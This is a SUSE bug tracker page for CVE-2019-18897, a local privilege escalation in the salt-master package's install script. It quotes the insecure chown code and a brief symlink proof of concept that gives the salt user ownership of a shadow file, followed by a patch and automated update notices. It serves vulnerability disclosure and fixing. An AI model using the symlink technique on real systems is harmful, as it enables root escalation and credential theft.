Bug 1157465 - (CVE-2019-18897) VUL-0: CVE-2019-18897: salt: Local privilege escalation from salt to root
(CVE-2019-18897)
VUL-0: CVE-2019-18897: salt: Local privilege escalation from salt to root
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Audits
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/247830/
CVSSv3.1:SUSE:CVE-2019-18897:8.4:(AV...
:
Depends on:
Blocks: 1154062
  Show dependency treegraph
 
Reported: 2019-11-21 12:44 UTC by Johannes Segitz
Modified: 2021-06-23 11:46 UTC (History)
5 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
Proposed patch (1.31 KB, patch)
2020-03-04 16:37 UTC, Pablo Suárez Hernández
Details | Diff
Patch for CVE-2019-18897 (1.59 KB, patch)
2020-03-05 10:20 UTC, Pablo Suárez Hernández
Details | Diff

Note You need to log in before you can comment on or make changes to this bug.
Description Johannes Segitz 2019-11-21 12:44:17 UTC
1218 %post master
1219 if [ $1 -eq 2 ] ; then
1220   # Upgrading from an earlier version.  If this is from 2014, where daemons
1221   # ran as root, we need to chown some stuff to salt in order for the new
1222   # version to actually work.  It seems a manual restart of salt-master may
1223   # still be required, but at least this will actually work given the file
1224   # ownership is correct.
1225   for file in master.{pem,pub} ; do
1226     [ -f /etc/salt/pki/master/$file ] && chown salt /etc/salt/pki/master/$file
1227   done
1228   MASTER_CACHE_DIR="/var/cache/salt/master"
1229   [ -d $MASTER_CACHE_DIR ] && chown -R salt:salt $MASTER_CACHE_DIR
1230   [ -f $MASTER_CACHE_DIR/.root_key ] && chown root:root $MASTER_CACHE_DIR/.root_key
1231   true
1232 fi

this allows the user salt to escalate to root. POC:
sh-5.0$ id
uid=158(salt) gid=444(salt) groups=444(salt)
sh-5.0$ pwd
/etc/salt/pki/master
sh-5.0$ ls -lah /test/
total 12K
drwxr-xr-x  2 root root 4.0K Nov 20 13:51 .
drwxr-xr-x 23 root root 4.0K Oct 25 11:01 ..
-rw-r-----  3 root root 1.2K Oct 25 13:20 shadow
sh-5.0$ ln -s /test/shadow master.pem

As root: zypper in -f salt-master

sh-5.0$ ls -lah /test/
total 12K
drwxr-xr-x  2 root root 4.0K Nov 20 13:51 .
drwxr-xr-x 23 root root 4.0K Oct 25 11:01 ..
-rw-r-----  3 salt root 1.2K Oct 25 13:20 shadow

The recursive chown can be exploited on systems with fs.protected_hardlinks=0.
We will not assign CVEs for these issues and documented the risk here:
https://www.suse.com/support/kb/doc/?id=7024245
But it would still be good to get rid of it

The chown in line 1230 can be used for DoS by making files unavailable to users/daemons.
Comment 1 Johannes Segitz 2019-11-22 13:10:52 UTC
This is CVE-2019-18897, NOT CVE-2019-3700 as stated earlier
Comment 7 Pablo Suárez Hernández 2020-03-04 16:37:34 UTC
Created attachment 831931 [details]
Proposed patch

This patch should prevent the user escalation by excluding any possible symlink at the time of executing "chown".

Security Team, what do you think about this patch?

Thanks in advance!
Comment 8 Pablo Suárez Hernández 2020-03-05 10:20:11 UTC
Created attachment 831993 [details]
Patch for CVE-2019-18897

Patch for CVE-2019-18897 after addressing feedback from security.
Comment 9 Pablo Suárez Hernández 2020-03-05 10:44:49 UTC
NOTE:

This is CVE is only affecting the "salt-master" package, as the bug is on the %post script of the "salt-master" package.

The old Salt 2016.11.10 spec is still affected but we do not distribute the "salt-master" package from that version, only the "salt-minion" part.
Comment 11 Swamp Workflow Management 2020-03-05 13:30:05 UTC
This is an autogenerated message for OBS integration:
This bug (1157465) was mentioned in
https://build.opensuse.org/request/show/781848 Factory / salt
Comment 13 Swamp Workflow Management 2020-03-10 14:12:11 UTC
SUSE-RU-2020:0625-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: recommended (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src):    salt-2019.2.0-5.64.1
SUSE Linux Enterprise Server 15-LTSS (src):    salt-2019.2.0-5.64.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    salt-2019.2.0-5.64.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    salt-2019.2.0-5.64.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 15 Swamp Workflow Management 2020-03-13 17:28:30 UTC
SUSE-RU-2020:14320-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: recommended (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 16 Swamp Workflow Management 2020-03-13 17:32:23 UTC
SUSE-SU-2020:0684-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: security (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:
SUSE Linux Enterprise Module for Server Applications 15-SP1 (src):    salt-2019.2.0-6.24.1
SUSE Linux Enterprise Module for Python2 15-SP1 (src):    salt-2019.2.0-6.24.1
SUSE Linux Enterprise Module for Basesystem 15-SP1 (src):    salt-2019.2.0-6.24.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 17 Swamp Workflow Management 2020-03-13 17:55:35 UTC
SUSE-RU-2020:0685-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: recommended (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:
SUSE Manager Tools 12 (src):    salt-2019.2.0-46.88.1
SUSE Manager Server 3.2 (src):    salt-2019.2.0-46.88.1
SUSE Manager Proxy 3.2 (src):    salt-2019.2.0-46.88.1
SUSE Linux Enterprise Point of Sale 12-SP2 (src):    salt-2019.2.0-46.88.1
SUSE Linux Enterprise Module for Advanced Systems Management 12 (src):    salt-2019.2.0-46.88.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 18 Swamp Workflow Management 2020-03-13 18:18:04 UTC
SUSE-RU-2020:14319-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: recommended (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 19 Swamp Workflow Management 2020-03-18 20:16:53 UTC
openSUSE-SU-2020:0357-1: An update that solves two vulnerabilities and has 7 fixes is now available.

Category: security (moderate)
Bug References: 1135656,1153611,1157465,1158940,1159118,1160931,1162327,1162504,1165425
CVE References: CVE-2019-17361,CVE-2019-18897
Sources used:
openSUSE Leap 15.1 (src):    salt-2019.2.0-lp151.5.12.1
Comment 20 Swamp Workflow Management 2020-03-24 20:14:36 UTC
SUSE-SU-2020:14331-1: An update that solves one vulnerability and has four fixes is now available.

Category: security (important)
Bug References: 1157465,1162327,1162504,1163981,1165425
CVE References: CVE-2019-18897
Sources used:

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 21 Swamp Workflow Management 2020-03-24 20:15:55 UTC
SUSE-SU-2020:0763-1: An update that solves one vulnerability and has four fixes is now available.

Category: security (important)
Bug References: 1157465,1162327,1162504,1163981,1165425
CVE References: CVE-2019-18897
Sources used:
SUSE Manager Tools 15-BETA (src):    salt-2019.2.3-8.12.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 22 Swamp Workflow Management 2020-03-24 20:17:51 UTC
SUSE-SU-2020:14332-1: An update that solves one vulnerability and has four fixes is now available.

Category: security (important)
Bug References: 1157465,1162327,1162504,1163981,1165425
CVE References: CVE-2019-18897
Sources used:

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 23 Swamp Workflow Management 2020-03-24 20:22:45 UTC
SUSE-SU-2020:0762-1: An update that solves one vulnerability and has four fixes is now available.

Category: security (important)
Bug References: 1157465,1162327,1162504,1163981,1165425
CVE References: CVE-2019-18897
Sources used:
SUSE Manager Tools 12-BETA (src):    salt-2019.2.3-49.12.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 28 Swamp Workflow Management 2020-06-23 16:39:12 UTC
SUSE-SU-2020:14402-1: An update that solves 11 vulnerabilities and has 245 fixes is now available.

Category: security (moderate)
Bug References: 1002529,1003449,1004047,1004260,1004723,1008933,1011304,1011800,1012398,1012999,1013876,1013938,1015882,1017078,1019386,1020831,1022562,1022841,1023535,1024406,1025896,1027044,1027240,1027426,1027722,1030009,1030073,1032213,1032452,1032931,1035914,1036125,1038855,1039370,1040886,1041993,1042749,1043111,1044719,1050003,1051948,1052264,1053376,1053955,1057635,1059291,1059758,1060230,1061407,1062462,1062464,1063419,1064520,1065792,1068446,1068566,1070372,1071322,1072599,1075950,1076578,1079048,1080290,1081151,1081592,1083294,1085667,1087055,1087278,1087581,1087891,1088070,1088888,1089112,1089362,1089526,1091371,1092161,1092373,1094055,1094190,1095507,1095651,1095942,1096514,1097174,1097413,1098394,1099323,1099460,1099887,1099945,1100142,1100225,1100697,1101780,1101812,1101880,1102013,1102218,1102265,1102819,1103090,1103530,1103696,1104034,1104154,1104491,1106164,1107333,1108557,1108834,1108969,1108995,1109023,1109893,1110938,1111542,1112874,1113698,1113699,1113784,1114029,1114197,1114474,1114824,1116343,1116837,1117995,1121091,1121439,1122663,1122680,1123044,1123512,1123865,1124277,1125015,1125610,1125744,1127389,1128061,1128554,1129079,1129243,1130077,1130588,1130784,1131114,1132076,1133523,1133647,1134860,1135360,1135507,1135567,1135732,1135881,1137642,1138454,1139761,1140193,1140912,1143301,1146192,1146382,1148311,1148714,1150447,1151650,1151947,1152366,1153090,1153277,1153611,1154620,1154940,1155372,1157465,1157479,1158441,1159284,1162327,1162504,1163871,1163981,1165425,1165572,1167437,1167556,1168340,1169604,1169800,1170104,1170288,1170595,1171687,1171906,1172075,1173072,769106,769108,776615,849184,849204,849205,879904,887879,889605,892707,902494,908849,926318,932288,945380,948245,955373,958350,959572,963322,965403,967803,969320,970669,971372,972311,972490,975093,975303,975306,975733,975757,976148,977264,978150,978833,979448,979676,980313,983017,983512,985112,985661,986019,987798,988506,989193,989798,990029,990439,990440,991048,993039,993549,996455,999852
CVE References: CVE-2016-1866,CVE-2016-9639,CVE-2017-12791,CVE-2017-14695,CVE-2017-14696,CVE-2018-15750,CVE-2018-15751,CVE-2019-17361,CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 30 Swamp Workflow Management 2020-07-21 04:37:25 UTC
SUSE-SU-2020:14431-1: An update that solves 11 vulnerabilities and has 251 fixes is now available.

Category: security (moderate)
Bug References: 1002529,1003449,1004047,1004260,1004723,1008933,1011304,1011800,1012398,1012999,1013876,1013938,1015882,1017078,1019386,1020831,1022562,1022841,1023535,1024406,1025896,1027044,1027240,1027426,1027722,1030009,1030073,1032213,1032452,1032931,1035914,1036125,1038855,1039370,1040886,1041993,1042749,1043111,1044719,1050003,1051948,1052264,1053376,1053955,1057635,1059291,1059758,1060230,1061407,1062462,1062464,1063419,1064520,1065792,1068446,1068566,1070372,1071322,1072599,1075950,1076578,1079048,1080290,1081151,1081592,1083294,1085667,1087055,1087278,1087581,1087891,1088070,1088888,1089112,1089362,1089526,1091371,1092161,1092373,1094055,1094190,1095507,1095651,1095942,1096514,1097174,1097413,1098394,1099323,1099460,1099887,1099945,1100142,1100225,1100697,1101780,1101812,1101880,1102013,1102218,1102265,1102819,1103090,1103530,1103696,1104034,1104154,1104491,1106164,1107333,1108557,1108834,1108969,1108995,1109023,1109893,1110938,1111542,1112874,1113698,1113699,1113784,1114029,1114197,1114474,1114824,1116343,1116837,1117995,1121091,1121439,1122663,1122680,1123044,1123512,1123865,1124277,1125015,1125610,1125744,1127389,1128061,1128554,1129079,1129243,1130077,1130588,1130784,1131114,1132076,1133523,1133647,1134860,1135360,1135507,1135567,1135656,1135732,1135881,1137642,1138454,1138952,1139761,1140193,1140912,1143301,1146192,1146382,1148311,1148714,1150447,1151650,1151947,1152366,1153090,1153277,1153611,1154620,1154940,1155372,1157465,1157479,1158441,1158940,1159118,1159284,1160931,1162327,1162504,1163871,1165425,1165572,1167437,1167556,1168340,1169604,1169800,1170042,1170104,1170288,1170595,1171687,1171906,1172075,1173072,1174165,769106,769108,776615,849184,849204,849205,879904,887879,889605,892707,902494,908849,926318,932288,945380,948245,955373,958350,959572,963322,965403,967803,969320,970669,971372,972311,972490,975093,975303,975306,975733,975757,976148,977264,978150,978833,979448,979676,980313,983017,983512,985112,985661,986019,987798,988506,989193,989798,990029,990439,990440,991048,993039,993549,996455,999852
CVE References: CVE-2016-1866,CVE-2016-9639,CVE-2017-12791,CVE-2017-14695,CVE-2017-14696,CVE-2018-15750,CVE-2018-15751,CVE-2019-17361,CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 31 Swamp Workflow Management 2020-07-21 04:48:13 UTC
SUSE-SU-2020:1971-1: An update that solves three vulnerabilities and has 12 fixes is now available.

Category: security (moderate)
Bug References: 1157465,1159284,1162327,1165572,1167437,1168340,1169604,1169800,1170104,1170288,1170595,1171906,1172075,1173072,1174165
CVE References: CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:
SUSE Manager Tools 12 (src):    python-singledispatch-3.4.0.3-1.5.1, salt-3000-46.101.1
SUSE Manager Server 3.2 (src):    python-singledispatch-3.4.0.3-1.5.1, salt-3000-46.101.1
SUSE Manager Proxy 3.2 (src):    python-singledispatch-3.4.0.3-1.5.1, salt-3000-46.101.1
SUSE Linux Enterprise Point of Sale 12-SP2 (src):    python-singledispatch-3.4.0.3-1.5.1, salt-3000-46.101.1
SUSE Linux Enterprise Module for Advanced Systems Management 12 (src):    python-singledispatch-3.4.0.3-1.5.1, salt-3000-46.101.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 32 Swamp Workflow Management 2020-07-21 05:02:33 UTC
SUSE-SU-2020:14430-1: An update that solves three vulnerabilities and has 18 fixes is now available.

Category: security (moderate)
Bug References: 1153090,1153277,1154940,1155372,1157465,1159284,1162327,1163871,1165572,1167437,1168340,1169604,1169800,1170104,1170288,1170595,1171687,1171906,1172075,1173072,1174165
CVE References: CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 33 Swamp Workflow Management 2020-07-21 05:22:19 UTC
SUSE-SU-2020:14429-1: An update that solves three vulnerabilities and has 18 fixes is now available.

Category: security (moderate)
Bug References: 1153090,1153277,1154940,1155372,1157465,1159284,1162327,1163871,1165572,1167437,1168340,1169604,1169800,1170104,1170288,1170595,1171687,1171906,1172075,1173072,1174165
CVE References: CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 34 Swamp Workflow Management 2020-07-21 05:24:53 UTC
SUSE-SU-2020:1973-1: An update that solves three vulnerabilities and has 12 fixes is now available.

Category: security (moderate)
Bug References: 1157465,1159284,1162327,1165572,1167437,1168340,1169604,1169800,1170104,1170288,1170595,1171906,1172075,1173072,1174165
CVE References: CVE-2019-18897,CVE-2020-11651,CVE-2020-11652
Sources used:
SUSE Linux Enterprise Server for SAP 15 (src):    salt-3000-5.78.1
SUSE Linux Enterprise Server 15-LTSS (src):    salt-3000-5.78.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    salt-3000-5.78.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    salt-3000-5.78.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 35 Jochen Breuer 2020-11-12 09:05:39 UTC
Can this be closed?
Comment 43 Swamp Workflow Management 2021-02-08 14:55:41 UTC
SUSE-SU-2021:0315-1: An update that solves 14 vulnerabilities and has 218 fixes is now available.

Category: security (moderate)
Bug References: 1002529,1004047,1004260,1004723,1008933,1011304,1011800,1012398,1012999,1017078,1019386,1020831,1022562,1022841,1023535,1025896,1027044,1027240,1027722,1030009,1030073,1032213,1032452,1032931,1035914,1036125,1038855,1039370,1040886,1041993,1042749,1043111,1050003,1051948,1052264,1053376,1053955,1057635,1059291,1059758,1060230,1061407,1062462,1062464,1063419,1064520,1065792,1068446,1068566,1071322,1072599,1075950,1079048,1081592,1083110,1087055,1087278,1087581,1087891,1088888,1089112,1089362,1089526,1091371,1092161,1092373,1094055,1095507,1095651,1095942,1096514,1097174,1097413,1098394,1099323,1099460,1099887,1099945,1100142,1100225,1100697,1101780,1101812,1101880,1102013,1102218,1102248,1102265,1102819,1103530,1104154,1104491,1106164,1107333,1108557,1108834,1108969,1108995,1109893,1110938,1112874,1113698,1113699,1113784,1114029,1114197,1114474,1114824,1116343,1116837,1117995,1121091,1121439,1122663,1122680,1123044,1123512,1123865,1124277,1125015,1128061,1128554,1129079,1130588,1130784,1131114,1132076,1133523,1133647,1134860,1135360,1135507,1135567,1135656,1135732,1137642,1138952,1139761,1140193,1140912,1143301,1146192,1146382,1148714,1150447,1151650,1151947,1152366,1153611,1154620,1157465,1157479,1158441,1158940,1159118,1159284,1159670,1160931,1162327,1162504,1165425,1165572,1167437,1167556,1168340,1169604,1169800,1170042,1170104,1170288,1170595,1171461,1171906,1172075,1172211,1173072,1173909,1173911,1173936,1174165,1175549,1175987,1176024,1176294,1176397,1176480,1177867,1178319,1178361,1178362,1178485,849184,849204,849205,955373,958350,959572,963322,965403,967803,969320,970669,971372,972311,972490,975093,975303,975306,975733,975757,976148,978150,978833,979448,979676,980313,983017,983512,985112,985661,986019,988506,989193,989798,990029,990439,990440,991048,993039,993549,996455,999852
CVE References: CVE-2016-1866,CVE-2016-9639,CVE-2017-12791,CVE-2017-14695,CVE-2017-14696,CVE-2018-15750,CVE-2018-15751,CVE-2019-17361,CVE-2019-18897,CVE-2020-11651,CVE-2020-11652,CVE-2020-16846,CVE-2020-17490,CVE-2020-25592
JIRA References: 
Sources used:

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 44 Swamp Workflow Management 2021-02-08 15:30:58 UTC
SUSE-SU-2021:0316-1: An update that solves 14 vulnerabilities and has 218 fixes is now available.

Category: security (moderate)
Bug References: 1002529,1004047,1004260,1004723,1008933,1011304,1011800,1012398,1012999,1017078,1019386,1020831,1022562,1022841,1023535,1025896,1027044,1027240,1027722,1030009,1030073,1032213,1032452,1032931,1035914,1036125,1038855,1039370,1040886,1041993,1042749,1043111,1050003,1051948,1052264,1053376,1053955,1057635,1059291,1059758,1060230,1061407,1062462,1062464,1063419,1064520,1065792,1068446,1068566,1071322,1072599,1075950,1079048,1081592,1083110,1087055,1087278,1087581,1087891,1088888,1089112,1089362,1089526,1091371,1092161,1092373,1094055,1095507,1095651,1095942,1096514,1097174,1097413,1098394,1099323,1099460,1099887,1099945,1100142,1100225,1100697,1101780,1101812,1101880,1102013,1102218,1102248,1102265,1102819,1103530,1104154,1104491,1106164,1107333,1108557,1108834,1108969,1108995,1109893,1110938,1112874,1113698,1113699,1113784,1114029,1114197,1114474,1114824,1116343,1116837,1117995,1121091,1121439,1122663,1122680,1123044,1123512,1123865,1124277,1125015,1128061,1128554,1129079,1130588,1130784,1131114,1132076,1133523,1133647,1134860,1135360,1135507,1135567,1135656,1135732,1137642,1138952,1139761,1140193,1140912,1143301,1146192,1146382,1148714,1150447,1151650,1151947,1152366,1153611,1154620,1157465,1157479,1158441,1158940,1159118,1159284,1159670,1160931,1162327,1162504,1165425,1165572,1167437,1167556,1168340,1169604,1169800,1170042,1170104,1170288,1170595,1171461,1171906,1172075,1172211,1173072,1173909,1173911,1173936,1174165,1175549,1175987,1176024,1176294,1176397,1176480,1177867,1178319,1178361,1178362,1178485,849184,849204,849205,955373,958350,959572,963322,965403,967803,969320,970669,971372,972311,972490,975093,975303,975306,975733,975757,976148,978150,978833,979448,979676,980313,983017,983512,985112,985661,986019,988506,989193,989798,990029,990439,990440,991048,993039,993549,996455,999852
CVE References: CVE-2016-1866,CVE-2016-9639,CVE-2017-12791,CVE-2017-14695,CVE-2017-14696,CVE-2018-15750,CVE-2018-15751,CVE-2019-17361,CVE-2019-18897,CVE-2020-11651,CVE-2020-11652,CVE-2020-16846,CVE-2020-17490,CVE-2020-25592
JIRA References: 
Sources used:

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 51 Johannes Segitz 2021-06-23 11:46:16 UTC
thanks for the fix